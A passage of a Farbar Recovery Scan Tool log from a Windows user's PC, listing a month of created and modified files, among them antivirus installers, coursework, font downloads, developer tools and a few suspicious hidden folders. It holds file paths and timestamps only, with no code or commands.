(Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) (Whitelisted) ========= (If an entry is included in the fixlist, the file/folder will be moved.) 2021-05-06 15:39 - 2021-05-06 15:53 - 000052831 _____ C:\Users\FRANCIS\Downloads\Addition.txt 2021-05-06 15:34 - 2021-05-07 11:02 - 000032662 _____ C:\Users\FRANCIS\Downloads\FRST.txt 2021-05-06 15:33 - 2021-05-07 10:59 - 000000000 ____D C:\FRST 2021-05-06 15:32 - 2021-05-06 15:32 - 002298368 _____ (Farbar) C:\Users\FRANCIS\Downloads\FRST64.exe 2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD C:\ProgramData\Kawmq 2021-05-06 14:25 - 2021-05-06 14:25 - 001310832 _____ (Google LLC) C:\Users\FRANCIS\Downloads\ChromeSetup.exe 2021-05-06 11:57 - 2021-05-06 11:57 - 001687040 _____ C:\WINDOWS\system32\libcrypto.dll 2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb 2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb 2021-05-06 11:56 - 2021-05-06 11:56 - 001314120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2021-05-06 11:56 - 2021-05-06 11:56 - 000700928 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll 2021-05-06 11:56 - 2021-05-06 11:56 - 000011351 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2021-05-06 11:54 - 2021-05-06 11:54 - 001163776 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2021-05-06 11:53 - 2021-05-06 11:53 - 001823816 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2021-05-06 11:53 - 2021-05-06 11:53 - 001393504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2021-05-06 11:53 - 2021-05-06 11:53 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe 2021-05-06 11:51 - 2021-05-06 11:51 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe 2021-05-06 11:51 - 2021-05-06 11:51 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe 2021-05-06 11:38 - 2021-05-06 11:38 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk 2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk 2021-05-06 11:38 - 2021-05-06 11:38 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\mbam 2021-05-06 11:37 - 2021-05-06 11:37 - 000220752 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys 2021-05-06 11:36 - 2021-05-06 11:36 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys 2021-05-06 11:35 - 2021-05-06 11:34 - 000199128 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys 2021-05-06 11:34 - 2021-05-06 11:34 - 000000000 ____D C:\ProgramData\Malwarebytes 2021-05-06 11:28 - 2021-05-06 11:28 - 000000000 ____D C:\Program Files\Malwarebytes 2021-05-06 09:27 - 2021-05-06 09:27 - 002078632 _____ (Malwarebytes) C:\Users\FRANCIS\Downloads\MBSetup.exe 2021-05-05 21:10 - 2021-05-06 10:23 - 000000000 ____D C:\Users\FRANCIS\Desktop\Hello Paris 2021-05-05 13:04 - 2021-05-05 13:05 - 000736768 _____ C:\Users\FRANCIS\Downloads\mws_gen_ode_ppt_euler.ppt 2021-05-04 20:39 - 2021-05-04 20:40 - 003578240 _____ (RCS LT) C:\Users\FRANCIS\Downloads\CCSetup.exe 2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\Users\Public\Desktop\Web Navigation.lnk 2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\ProgramData\Desktop\Web Navigation.lnk 2021-05-04 17:36 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys 2021-05-04 17:35 - 2021-05-04 17:35 - 000000000 ____D C:\WINDOWS\system32\Drivers\etc\BACKUP 2021-05-04 09:30 - 2021-05-04 09:30 - 000125168 _____ (Zoom Video Communications, Inc.) C:\Users\FRANCIS\Downloads\Zoom_cm_ds_mv9ZFe0KOjFvdR5MS6xrZlbbY96oVd7AAzLVq@UT4O-2pbNxQCn-E8_kc4bbc386e4a84bbc_.exe 2021-05-03 21:46 - 2021-05-03 21:46 - 000112099 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP14.pdf 2021-05-03 20:58 - 2021-05-03 20:58 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe 2021-05-03 19:54 - 2021-05-03 19:54 - 000206596 _____ C:\Users\FRANCIS\Downloads\Pentecostes_Daniela_MP12.pdf 2021-05-02 19:45 - 2021-05-02 19:45 - 001345893 _____ C:\Users\FRANCIS\Downloads\PS2.1-Ramos-Riano-San-Pedro-Santiago.pdf 2021-05-02 18:35 - 2021-05-02 18:35 - 000043135 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210502-103502.zip 2021-05-02 17:52 - 2021-05-02 18:02 - 000000000 ____D C:\Users\FRANCIS\Desktop\Quarterpound 2021-05-02 16:41 - 2021-05-02 16:41 - 000001131 _____ C:\Users\FRANCIS\Desktop\CLUE Classic.lnk 2021-05-02 16:41 - 2021-05-02 16:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CLUE Classic 2021-05-02 16:16 - 2021-05-02 16:16 - 000000000 ____D C:\Users\FRANCIS\Desktop\fonts-main 2021-05-02 16:14 - 2021-04-19 10:46 - 654079606 _____ C:\Users\FRANCIS\Desktop\fonts-main.zip 2021-05-02 16:02 - 2021-05-02 17:07 - 000000000 ____D C:\Program Files (x86)\CLUE Classic 2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen] 2021-05-02 15:42 - 2021-05-02 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\LocalLow\BitTorrent 2021-05-02 15:26 - 2021-05-02 15:26 - 000000000 ____D C:\Program Files (x86)\ReflexiveArcade 2021-05-01 20:38 - 2021-05-01 20:38 - 000427332 _____ C:\Users\FRANCIS\Downloads\Frankenstein-by-Shelley.txt 2021-05-01 20:38 - 2021-05-01 20:38 - 000000042 _____ C:\Users\FRANCIS\Downloads\simple.txt 2021-05-01 20:35 - 2021-05-01 20:35 - 000675711 _____ C:\Users\FRANCIS\Downloads\Distances.xlsx 2021-05-01 19:09 - 2021-05-01 19:09 - 000012176 _____ C:\Users\FRANCIS\Downloads\Introduction-to-Programming-with-MATLAB-solutions--master.zip 2021-05-01 19:09 - 2019-03-13 12:58 - 000000000 ____D C:\Users\FRANCIS\Desktop\Introduction-to-Programming-with-MATLAB-solutions--master 2021-05-01 18:42 - 2021-05-01 18:42 - 002308003 _____ C:\Users\FRANCIS\Downloads\introduction-to-programming-with-matlab-master.zip 2021-05-01 10:23 - 2021-05-01 10:23 - 000113329 _____ C:\Users\FRANCIS\Downloads\financials sample template format only(1)(1).xlsx 2021-04-30 18:04 - 2021-04-30 18:04 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete) (1).xlsx 2021-04-30 17:03 - 2021-04-30 17:04 - 000026514 _____ C:\Users\FRANCIS\Downloads\Book1-KeyAssumptions.xlsx 2021-04-29 20:20 - 2021-04-29 20:20 - 000959197 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-121954.zip 2021-04-29 20:05 - 2021-04-29 20:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Recovery Toolbox for RAR 2021-04-29 18:39 - 2021-04-29 18:40 - 000931837 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103853.zip 2021-04-29 18:37 - 2021-04-29 18:37 - 001064473 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103705.zip 2021-04-29 17:22 - 2021-04-29 17:22 - 000053020 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-092143.zip 2021-04-28 14:50 - 2021-04-28 14:51 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete).xlsx 2021-04-28 13:20 - 2021-04-28 13:20 - 000003018 _____ C:\WINDOWS\system32\Tasks\McInstruTrack 2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\Users\Public\Desktop\McAfee® Total Protection.lnk 2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\ProgramData\Desktop\McAfee® Total Protection.lnk 2021-04-28 13:15 - 2021-05-07 10:50 - 000000000 __RSD C:\Users\FRANCIS\Documents\McAfee Vaults 2021-04-28 13:15 - 2021-04-28 13:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2021-04-28 13:15 - 2021-04-28 13:15 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\McAfee File Lock 2021-04-28 13:15 - 2021-01-18 02:58 - 000089112 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\McPvDrv.sys 2021-04-28 13:15 - 2020-05-26 00:12 - 000089096 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\SET8D4E.tmp 2021-04-28 13:14 - 2020-05-26 00:11 - 000218960 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys 2021-04-28 13:08 - 2021-04-28 16:51 - 000003316 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon 2021-04-28 13:01 - 2021-05-05 14:53 - 000000000 ____D C:\Program Files (x86)\McAfee 2021-04-28 13:01 - 2021-04-28 16:53 - 000000000 ____D C:\Program Files\McAfee 2021-04-28 13:01 - 2021-04-28 16:52 - 000000000 ____D C:\Program Files\Common Files\McAfee 2021-04-28 13:01 - 2021-04-28 14:07 - 000003706 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare) 2021-04-28 13:01 - 2021-04-28 13:04 - 000000000 ____D C:\Program Files\McAfee.com 2021-04-28 13:01 - 2021-04-28 13:01 - 000000000 ____D C:\Program Files\Common Files\AV 2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini 2021-04-28 09:10 - 2021-04-28 09:14 - 005794408 _____ (McAfee, LLC) C:\Users\FRANCIS\Downloads\mcafee_trial_setup_433.0207.3919_key.exe 2021-04-27 19:32 - 2021-04-27 19:32 - 000205659 _____ C:\Users\FRANCIS\Downloads\chapter_9__Practice_questions_and_solutions.docx.pdf 2021-04-27 18:30 - 2021-04-27 18:30 - 000178921 _____ C:\Users\FRANCIS\Downloads\chapter_8_practice_questions_solution.docx.pdf 2021-04-27 18:06 - 2021-04-27 18:08 - 004323668 _____ C:\Users\FRANCIS\Downloads\Gas Power Cycle.zip 2021-04-27 18:06 - 2021-04-27 18:06 - 001022464 _____ C:\Users\FRANCIS\Downloads\Lecture 2 Gas Power Cycle.ppt 2021-04-27 18:04 - 2021-04-27 18:05 - 004372125 _____ C:\Users\FRANCIS\Downloads\Rankine Cycle with Regeneration.zip 2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def.lkg 2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def 2021-04-27 09:00 - 2021-04-27 09:00 - 000011324 _____ C:\WINDOWS\system32\uat64.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000003313 _____ C:\WINDOWS\system32\servers.def.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp 2021-04-27 09:00 - 2021-04-27 09:00 - 000000604 _____ C:\WINDOWS\system32\prod-pgm.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000000342 _____ C:\WINDOWS\system32\prod-vps.vpx 2021-04-26 20:34 - 2021-04-26 20:34 - 000282407 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP10.pdf 2021-04-25 17:25 - 2021-05-07 09:12 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee 2021-04-25 17:14 - 2021-04-25 17:14 - 000125688 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\mferkdet.sys 2021-04-25 17:09 - 2020-12-10 20:36 - 000583720 _____ (McAfee, LLC) C:\WINDOWS\system32\mfevtps.exe 2021-04-25 17:08 - 2021-04-28 16:44 - 000000000 ____D C:\ProgramData\McAfee 2021-04-25 16:45 - 2021-05-06 14:34 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2021-04-25 16:44 - 2021-05-06 14:42 - 000388514 _____ C:\WINDOWS\ntbtlog.txt 2021-04-25 11:05 - 2021-04-26 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software 2021-04-25 11:04 - 2021-04-25 11:04 - 000000000 ____D C:\Program Files\Common Files\Avast Software 2021-04-25 10:25 - 2021-04-25 10:25 - 000220392 _____ (AVAST Software) C:\Users\FRANCIS\Downloads\avast_free_antivirus_setup_online.exe 2021-04-23 21:06 - 2021-04-23 21:24 - 000000000 _RSHD C:\ProgramData\Key-Base 2021-04-23 21:06 - 2021-04-23 21:06 - 000000000 ____D C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} 2021-04-23 21:00 - 2021-04-23 21:05 - 009772064 _____ (Stellar Information Technology Pvt Ltd ) C:\Users\FRANCIS\Downloads\StellarRepairforPhoto.exe 2021-04-23 20:31 - 2021-04-23 20:31 - 000000000 ____D C:\Users\FRANCIS\Desktop\Easeus 23 20_31 2021-04-23 16:46 - 2021-04-23 16:46 - 000550953 _____ C:\Users\FRANCIS\Downloads\Rebyu.pdf 2021-04-23 15:43 - 2021-04-23 15:43 - 000528434 _____ C:\Users\FRANCIS\Downloads\MARKETING_PLAN_TECHNICAL_PLAN_PRICING_PLAN.docx.pdf 2021-04-23 15:26 - 2021-04-23 15:27 - 004500974 _____ C:\Users\FRANCIS\Downloads\IE103_FINAL_BUSINESS_PLAN_FACE_SHIELD.docx.pdf 2021-04-23 15:24 - 2021-04-23 15:24 - 000787017 _____ C:\Users\FRANCIS\Downloads\CADELI__A_AMIEL_Technical_Plan_InventorEaze.docx.pdf 2021-04-22 21:21 - 2021-04-23 12:12 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims3worldtool167 2021-04-22 21:18 - 2021-04-22 21:18 - 000008531 _____ C:\Users\FRANCIS\Downloads\sims3worldtool167_archive.torrent 2021-04-21 16:53 - 2021-04-21 16:53 - 000041503 _____ C:\Users\FRANCIS\Downloads\financials sample template format updated 4-21-21.xlsx 2021-04-21 15:55 - 2021-04-21 15:55 - 000000000 ____D C:\Users\FRANCIS\Downloads\PengRobinson 2021-04-21 15:54 - 2021-04-21 15:54 - 000001965 _____ C:\Users\FRANCIS\Downloads\PengRobinson.zip 2021-04-21 15:03 - 2021-04-21 15:03 - 000000000 ____D C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots 2021-04-19 09:34 - 2021-04-19 09:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\Mission Gothic 2021-04-18 10:22 - 2021-04-18 10:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Carved 2021-04-18 10:21 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Sans 2021-04-18 10:20 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab 2021-04-18 10:16 - 2021-04-18 10:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab Rough 2021-04-17 21:49 - 2021-04-17 21:50 - 027357835 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-134918.zip 2021-04-17 21:34 - 2021-04-17 21:36 - 025680562 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-133438.zip 2021-04-17 20:29 - 2021-04-17 20:30 - 001378716 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122915.zip 2021-04-17 20:27 - 2021-04-17 20:27 - 001391374 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122711.zip 2021-04-17 20:24 - 2021-04-17 20:24 - 001307436 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122359.zip 2021-04-17 20:22 - 2021-04-17 20:22 - 001320474 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122211.zip 2021-04-17 20:15 - 2021-04-17 20:16 - 001642500 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121554.zip 2021-04-17 20:13 - 2021-04-17 20:14 - 001642946 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121341.zip 2021-04-17 18:02 - 2021-04-17 18:03 - 051943779 _____ C:\Users\FRANCIS\Downloads\Problem Exercise 8.7 Power Cycle with regeneration.pdf 2021-04-17 16:37 - 2021-04-17 16:39 - 001959151 _____ C:\Users\FRANCIS\Downloads\Chapter 9. Refrigeration and Liquefaction MCA.pptx 2021-04-17 16:28 - 2021-04-17 16:29 - 001329415 _____ C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots.zip 2021-04-16 18:23 - 2021-04-20 09:44 - 000138601 _____ C:\Users\FRANCIS\Downloads\litmusports-results.pptx 2021-04-16 13:26 - 2021-04-16 13:26 - 000231248 _____ C:\WINDOWS\system32\containerdevicemanagement.dll 2021-04-15 20:59 - 2021-04-19 20:45 - 000000000 ____D C:\Users\FRANCIS\Desktop\YB COLLECTION 2021-04-15 16:21 - 2021-04-15 16:21 - 000043972 _____ C:\Users\FRANCIS\Downloads\11401.zip 2021-04-15 11:58 - 2020-08-14 15:59 - 000043416 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\NvModuleTracker.sys 2021-04-14 20:20 - 2021-04-14 20:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Eurostile Next 2021-04-14 20:20 - 2021-04-14 20:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\American Typewriter 2021-04-14 20:19 - 2021-04-14 20:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue Pro 2021-04-14 20:18 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Kai 2021-04-14 20:17 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue 2021-04-14 20:17 - 2021-04-14 20:17 - 000000000 ____D C:\Users\FRANCIS\Downloads\Rosewood 2021-04-14 20:16 - 2021-04-14 20:16 - 000000000 ____D C:\Users\FRANCIS\Downloads\One Stroke Script 2021-04-14 17:44 - 2021-04-14 17:45 - 000714992 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-093253.zip 2021-04-14 17:06 - 2021-04-14 17:06 - 000073143 _____ C:\Users\FRANCIS\Downloads\the-sims-sans-cufonfonts.zip 2021-04-14 17:05 - 2021-04-14 17:05 - 000073333 _____ C:\Users\FRANCIS\Downloads\The-Sims-Sans-Font.zip 2021-04-14 16:25 - 2021-04-14 16:25 - 000575764 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082508.zip 2021-04-14 16:24 - 2021-04-14 16:24 - 001638615 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082414.zip 2021-04-14 16:18 - 2021-04-14 16:18 - 001593898 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081827.zip 2021-04-14 16:15 - 2021-04-14 16:16 - 002110967 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081533.zip 2021-04-13 18:08 - 2021-04-13 18:09 - 002648212 _____ C:\Users\FRANCIS\Downloads\eurostile-next-pro-cufonfonts.zip 2021-04-13 17:42 - 2021-04-13 17:42 - 000205230 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-094200.zip 2021-04-13 17:27 - 2021-04-13 17:27 - 000086034 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-092705.zip 2021-04-13 15:22 - 2021-04-13 15:22 - 000094518 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072238.zip 2021-04-13 15:20 - 2021-04-13 15:20 - 000043667 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072045.zip 2021-04-13 15:19 - 2021-04-13 15:19 - 000021551 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071930.zip 2021-04-13 15:17 - 2021-04-13 15:17 - 001318241 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071720.zip 2021-04-13 15:16 - 2021-04-13 15:16 - 001336842 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071602.zip 2021-04-13 12:34 - 2021-04-13 12:35 - 000000000 ____D C:\Users\FRANCIS\Downloads\Akko 2021-04-13 12:34 - 2021-04-13 12:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\FF Trademarker 2021-04-13 12:27 - 2021-04-13 12:28 - 000398306 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042745.zip 2021-04-13 12:23 - 2021-04-13 12:23 - 000808345 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042301.zip 2021-04-13 12:21 - 2021-04-13 12:21 - 001808740 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042057.zip 2021-04-13 11:49 - 2021-04-13 11:49 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\npm-cache 2021-04-13 11:28 - 2021-04-13 11:30 - 000000000 ____D C:\Python39 2021-04-13 11:28 - 2021-04-13 11:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.9 2021-04-13 11:28 - 2021-04-13 11:28 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Package Cache 2021-04-13 11:08 - 2021-04-13 11:28 - 000000000 ____D C:\ProgramData\chocolatey 2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js 2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\Program Files\nodejs 2021-04-13 11:04 - 2021-04-13 11:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\npm 2021-04-13 10:48 - 2021-04-13 11:02 - 028917760 _____ C:\Users\FRANCIS\Downloads\node-v15.14.0-x64.msi 2021-04-12 20:14 - 2021-04-12 20:14 - 000000000 ____D C:\Users\FRANCIS\Downloads\myfonts-win.exe 2021-04-12 20:14 - 2021-04-12 20:13 - 018481401 _____ C:\Users\FRANCIS\Downloads\myfonts-win.exe.zip 2021-04-12 18:29 - 2021-05-02 09:50 - 000000000 ____D C:\Users\FRANCIS\Desktop\myfonts-downloader 2021-04-12 18:29 - 2021-04-12 18:27 - 000003240 _____ C:\Users\FRANCIS\Downloads\myfonts-downloader.zip 2021-04-12 18:09 - 2021-05-06 15:20 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Code 2021-04-12 18:09 - 2021-05-06 09:42 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2021-04-12 18:09 - 2021-04-12 18:09 - 000001413 _____ C:\Users\FRANCIS\Desktop\Visual Studio Code.lnk 2021-04-12 18:09 - 2021-04-12 18:09 - 000000000 ____D C:\Users\FRANCIS\.vscode 2021-04-10 20:36 - 2021-04-11 14:46 - 000000000 ____D C:\Users\FRANCIS\Downloads\Maude 1972 to 1978 (Complete TV series in MP4 format) 2021-04-10 18:42 - 2021-04-10 18:42 - 000000000 ____D C:\Program Files (x86)\LooksBuilder 2021-04-08 15:15 - 2021-04-08 15:15 - 000000000 ____D C:\Program Files (x86)\Teams Installer 2021-04-08 15:12 - 2021-04-08 15:12 - 000002463 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002458 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002421 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002414 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002408 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools 2021-04-08 15:11 - 2021-04-08 15:11 - 000000000 ____D C:\Program Files\Common Files\DESIGNER 2021-04-08 13:22 - 2021-05-02 14:24 - 000000000 ____D C:\Program Files\Microsoft Office 2021-04-08 13:22 - 2021-04-08 13:22 - 000000000 ____D C:\Program Files\Microsoft Office 15 2021-04-08 13:16 - 2021-04-08 13:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Beta Apps 2021-04-07 09:58 - 2021-05-03 22:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\discord 2021-04-07 09:58 - 2021-05-03 21:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Discord 2021-04-07 09:58 - 2021-04-07 09:58 - 000002244 _____ C:\Users\FRANCIS\Desktop\Discord.lnk 2021-04-07 09:58 - 2021-04-07 09:58 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2021-05-07 11:04 - 2019-10-03 20:00 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2021-05-07 11:04 - 2019-10-03 20:00 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData 2021-05-07 10:53 - 2019-12-07 17:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2021-05-07 10:53 - 2019-05-24 05:05 - 000000000 ___RD C:\Users\FRANCIS\OneDrive 2021-05-07 10:51 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA 2021-05-07 10:49 - 2019-05-24 05:02 - 000000000 __SHD C:\Users\FRANCIS\IntelGraphicsProfiles 2021-05-07 10:47 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Registration 2021-05-07 10:46 - 2020-09-30 19:34 - 001262352 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2021-05-07 10:44 - 2020-09-30 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2021-05-07 10:44 - 2020-09-30 19:34 - 000008192 ___SH C:\DumpStack.log.tmp 2021-05-07 10:44 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\ServiceState 2021-05-07 10:43 - 2019-12-07 17:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI 2021-05-07 10:37 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Packages 2021-05-07 10:37 - 2019-12-07 17:14 - 000000000 ___HD C:\Program Files\WindowsApps 2021-05-07 10:37 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2021-05-07 10:19 - 2020-11-14 21:01 - 000000000 ____D C:\Program Files\Common Files\Adobe 2021-05-07 10:19 - 2020-11-14 21:00 - 000000000 ____D C:\Program Files\Adobe 2021-05-07 10:19 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Adobe 2021-05-07 10:19 - 2019-07-08 11:54 - 000000000 ____D C:\Users\Public\Documents\Adobe 2021-05-07 10:19 - 2019-07-08 11:54 - 000000000 ____D C:\ProgramData\Documents\Adobe 2021-05-07 10:17 - 2020-10-07 18:23 - 000000000 ____D C:\ProgramData\Adobe 2021-05-07 09:56 - 2020-10-07 18:26 - 000000000 ____D C:\Program Files (x86)\Adobe 2021-05-07 09:56 - 2020-10-05 12:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Adobe 2021-05-07 08:42 - 2020-09-30 19:58 - 000859788 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2021-05-07 08:42 - 2019-12-07 17:13 - 000000000 ____D C:\WINDOWS\INF 2021-05-07 08:37 - 2021-01-20 20:37 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\NVIDIA Corporation 2021-05-06 20:59 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\Other Files 2021-05-06 19:52 - 2020-09-30 19:34 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2021-05-06 14:18 - 2020-09-29 18:48 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Google 2021-05-06 12:30 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2021-05-06 12:21 - 2019-12-07 17:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2021-05-06 12:16 - 2019-12-07 